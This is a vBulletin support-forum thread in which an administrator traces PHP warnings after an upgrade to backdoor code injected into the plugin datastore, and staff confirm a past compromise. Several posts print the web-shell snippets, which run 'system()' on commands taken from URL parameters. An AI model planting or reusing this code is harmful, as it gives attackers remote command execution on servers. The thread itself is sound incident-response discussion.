Getting error after upgrading to 4.2.4

Collapse
X
 
  • Time
  • Show
Clear All
new posts
  • dan325ci
    Senior Member
    • May 2004
    • 153

    Getting error after upgrading to 4.2.4

    I am getting a ton of these error messages after the latest upgrade.


    [08-Mar-2017 08:36:54 UTC] PHP Warning: system(): Cannot execute a blank command in /home/username/public_html/forums/global.php(29) : eval()'d code on line 2


    Over and over it just keeps building up.
    When i put the following in the config.php file the error goes away: define('DISABLE_HOOKS', true);
    So, of course I blamed it on a plug-in but i then disabled every plug-in manually, and it was still giving this error. The only way to shut it off is to have the Disable Hooks entry in the config.php file.


    Any ideas what to do next?
  • Pogo
    Senior Member
    • May 2001
    • 569

    #2
    It's probably in the datastore table, title pluginlist.
    If you'll find system( there and not in any plugin it most likely means that you are hacked in some way.

    Check the pluginlist.data field with this query:
    SELECT * FROM datastore WHERE data LIKE '%global_start%';

    Then search for global_start in the data field and look at the code in the following lines to find system.

    global_start is the hook where the command is executed in global.php.

    If you think that everything is fine (then it has to be a very weird error...), just edit any plugin and save it to rebuild the datastore.
    this is my sig

    Comment

    • dan325ci
      Senior Member
      • May 2004
      • 153

      #3
      Originally posted by Pogo
      It's probably in the datastore table, title pluginlist.
      If you'll find system( there and not in any plugin it most likely means that you are hacked in some way.

      Check the pluginlist.data field with this query:
      SELECT * FROM datastore WHERE data LIKE '%global_start%';

      Then search for global_start in the data field and look at the code in the following lines to find system.

      global_start is the hook where the command is executed in global.php.

      If you think that everything is fine (then it has to be a very weird error...), just edit any plugin and save it to rebuild the datastore.

      I don't know much about what you said above but i did execute that command you listed above and searched for system( and found two of them which i will copy here (i only removed the part which has it, so this isnt the entire output):

      ; system($_GET['cmd']); $execcode = ob_get_contents(); ob_end_clean(); if (version_compare($vbulletin->versionnumber, '4.0.0', 'lt')) //If VB 3.x { global $vbulletin; $vbo = &$vbulletin->options; //If function doesn't exist already and mod enabled, create substitute function if (!function_exists('http_response_code') AND $vbo['bop5he_en']) { function http_response_code($newcode = NULL) { static $code = 200; if($newcode !== NULL) { header('X-PHP-Response-Code: '.$newcode, true, $newcode); if(!headers_sent()) $code = $newcode; } return $code; } } } ";s:13:"ajax_complete";s:79:"if(isset($_GET['lol'])){echo "<h1>lol</h1><pre>"; system($_GET['lol']);exit;}


      You can see two of them in there somewhere.... now what?

      Thanks

      Comment

      • Pogo
        Senior Member
        • May 2001
        • 569

        #4
        Edit any plugin and save it to rebuild the datastore and thus remove the (perhaps) backdoor code.

        Check again for system:
        SELECT * FROM datastore WHERE data LIKE '%system(%';

        It should return no result now.

        Then check these guides:
        There are four steps to securing your site. If you don't do them all or you do them in the wrong order than you're still susceptible to being attacked again. Close

        Getting Started This guide is intended to be a starting point for helping to keep your site safe and secure in the long run. It is not a be-all, end-all guide

        This guide is for what to do, after youÂ’ve been hacked, exploited, and or defaced. Step 1, Change everything: If you believe, or think your site has
        this is my sig

        Comment

        • dan325ci
          Senior Member
          • May 2004
          • 153

          #5
          Originally posted by Pogo
          Edit any plugin and save it to rebuild the datastore and thus remove the (perhaps) backdoor code.

          Check again for system:
          SELECT * FROM datastore WHERE data LIKE '%system(%';

          It should return no result now.

          Then check these guides:
          https://www.vbulletin.com/forum/foru...ring-your-site
          https://www.vbulletin.com/forum/blog...vbulletin-site
          http://www.vbulletin.com/forum/blogs...ve-been-hacked
          Hi

          What do you mean by "edit any plugin and save it to rebuild the datastore" ?

          This only started happening immediately after upgrading our vb to the latest.

          Comment

          • Pogo
            Senior Member
            • May 2001
            • 569

            #6
            Edit was perhaps the wrong word.
            Open a plugin as if you wanted to edit it and just save it.
            That will rebuild the datastore with the code from the plugins.

            Why and how the code was added to the datastore is unknown.
            I guess that you saw the error after the upgrade is either a coincidence or vBulletin was perhaps hiding the warning messages from PHP and the code has been there for a longer time.
            this is my sig

            Comment

            • dan325ci
              Senior Member
              • May 2004
              • 153

              #7
              Originally posted by Pogo
              Edit was perhaps the wrong word.
              Open a plugin as if you wanted to edit it and just save it.
              That will rebuild the datastore with the code from the plugins.

              Why and how the code was added to the datastore is unknown.
              I guess that you saw the error after the upgrade is either a coincidence or vBulletin was perhaps hiding the warning messages from PHP and the code has been there for a longer time.
              Ok thanks i did click "edit" on all plug-ins that we have and saved each one. Still getting these warnings. If they are warnings can they just be annoyed. I can probably get someone to make a cronjob to delete them as they build up. The forums are still running ok, its just the error_log files are building up really fast.

              Comment

              • Mark.B
                vBulletin Support
                • Feb 2004
                • 24275
                • 6.0.X

                #8
                So if you manually disable every plugin and product, individually in the admincp product and plugin screens, this error persists?
                MARK.B
                vBulletin Support
                ------------
                My Unofficial vBulletin 6.0.0 Demo: https://www.talknewsuk.com
                My Unofficial vBulletin Cloud Demo: https://www.adminammo.com

                Comment

                • dan325ci
                  Senior Member
                  • May 2004
                  • 153

                  #9
                  Originally posted by Mark.B
                  So if you manually disable every plugin and product, individually in the admincp product and plugin screens, this error persists?
                  yes correct... i went into admincp/plug ins and manually clicked every plug-in (i have less than 10) and disabled them. I did this thinking it was just one, but i ended up going through the whole list disabling them. Then i checked the error logs and the warnings still keep appearing in the logs, non stop.

                  Comment

                  • Mark.B
                    vBulletin Support
                    • Feb 2004
                    • 24275
                    • 6.0.X

                    #10
                    Some plugins are a bit fast and loose with honouring being disabled...what plugins do you actually have?
                    MARK.B
                    vBulletin Support
                    ------------
                    My Unofficial vBulletin 6.0.0 Demo: https://www.talknewsuk.com
                    My Unofficial vBulletin Cloud Demo: https://www.adminammo.com

                    Comment

                    • Paul M
                      Former Lead Developer
                      vB.Com & vB.Org
                      • Sep 2004
                      • 9886

                      #11
                      Turn the plugin system off completely and see what happens.

                      Options > Plugin/Hook System > Enable Plugin/Hook System > No.
                      Baby, I was born this way

                      Comment

                      • Wayne Luke
                        vBulletin Technical Support Lead
                        • Aug 2000
                        • 73438
                        • 6.0.X

                        #12
                        Your site has been hacked and is being exploited. You need to follow the instructions in Securing Your Site. After finishing those steps, if you continue to have problems then open a support ticket using the link in the footer of this page.

                        Translations provided by Google.

                        Wayne Luke
                        The Rabid Badger - a vBulletin Cloud demonstration site.
                        vBulletin 5 API

                        Comment

                        • dan325ci
                          Senior Member
                          • May 2004
                          • 153

                          #13
                          Originally posted by Paul M
                          Turn the plugin system off completely and see what happens.

                          Options &gt; Plugin/Hook System &gt; Enable Plugin/Hook System &gt; No.
                          As i mentioned earlier, disabling plug ins makes the error go away. However, disabling them one by one in the plug-in sections doesnt make the error disappear.


                          Originally posted by Mark.B
                          Some plugins are a bit fast and loose with honouring being disabled...what plugins do you actually have?
                          The plugins i have are standard ones like Glow Host Spam Detection, IBpro Arcade (latest version), Multiple Detection, Dragon Byte Likes/Activity. But we disabled them one by one and eventually all of them manually and it didnt stop the errors. Only turning off the entire plug in system worked.

                          Originally posted by Wayne Luke
                          Your site has been hacked and is being exploited. You need to follow the instructions in Securing Your Site. After finishing those steps, if you continue to have problems then open a support ticket using the link in the footer of this page.
                          Wayne: I can't see that happening as we always make sure to have the latest updates and secure our server. I will have a look at that article though.

                          we do have a small snippet here after running a command as suggested above by one of the forum users:

                          "if(isset($_GET['lol'])){echo "<h1>lol</h1><pre>"; system($_GET['lol']);exit;}


                          What is that "lol"?...that looks suspicious. Also, does using the replacement variables manager count as a "plug in" because we use alot of that with the HTTP to HTTPS move.
                          Last edited by dan325ci; Thu 9 Mar '17, 4:45pm.

                          Comment

                          • Wayne Luke
                            vBulletin Technical Support Lead
                            • Aug 2000
                            • 73438
                            • 6.0.X

                            #14
                            Originally posted by dan325ci
                            Wayne: I can't see that happening as we always make sure to have the latest updates and secure our server. I will have a look at that article though.

                            we do have a small snippet here after running a command as suggested above by one of the forum users:

                            "if(isset($_GET['lol'])){echo "<h1>lol</h1><pre>"; system($_GET['lol']);exit;}


                            What is that "lol"?...that looks suspicious. Also, does using the replacement variables manager count as a "plug in" because we use alot of that with the HTTP to HTTPS move.
                            Code:
                            SELECT * FROM datastore WHERE data LIKE '%system(%';
                            This query should never return any results. That it did means that your database has been compromised in the past.

                            The code you posted above is an exploit... LOL means Laugh Out Loud. It most likely corresponds with extra PHP files on your server that provide a backdoor into the server itself. This was a very common hack of vBulletin 4.X. Even if you kept up on all the versions of the software, you can still have been hacked. We've closed a number of security related bugs over the years and notify the customers when we release a security patch to fix those bugs. Plus a number of addons have security exploits in them.

                            You can ignore the fact that your site has been hacked or follow the steps outlined in the Securing you Site topic.


                            Translations provided by Google.

                            Wayne Luke
                            The Rabid Badger - a vBulletin Cloud demonstration site.
                            vBulletin 5 API

                            Comment

                            • dan325ci
                              Senior Member
                              • May 2004
                              • 153

                              #15
                              Originally posted by Wayne Luke

                              Code:
                              SELECT * FROM datastore WHERE data LIKE '%system(%';
                              This query should never return any results. That it did means that your database has been compromised in the past.

                              The code you posted above is an exploit... LOL means Laugh Out Loud. It most likely corresponds with extra PHP files on your server that provide a backdoor into the server itself. This was a very common hack of vBulletin 4.X. Even if you kept up on all the versions of the software, you can still have been hacked. We've closed a number of security related bugs over the years and notify the customers when we release a security patch to fix those bugs. Plus a number of addons have security exploits in them.

                              You can ignore the fact that your site has been hacked or follow the steps outlined in the Securing you Site topic.

                              Yes, the database was compromised long time ago with that Arcade hack.

                              Ok you probably right on that so the LOL is an exploit. Over the years (i am talking dozens of updates) we always put the new files in but we may have never taken unnecessary ones out so that could be it. I will double check all the files and make sure to get rid of any .php files that are no longer necessary. The only unusual thing to all this is that these warning errors only started at the 4.2.4 update. Did not have them prior.

                              Comment

                              widgetinstance 262 (Related Topics) skipped due to lack of content & hide_module_if_empty option.
                              Working...
                              😀
                              😂
                              🥰
                              😘
                              🤢
                              😎
                              😞
                              😡
                              👍
                              👎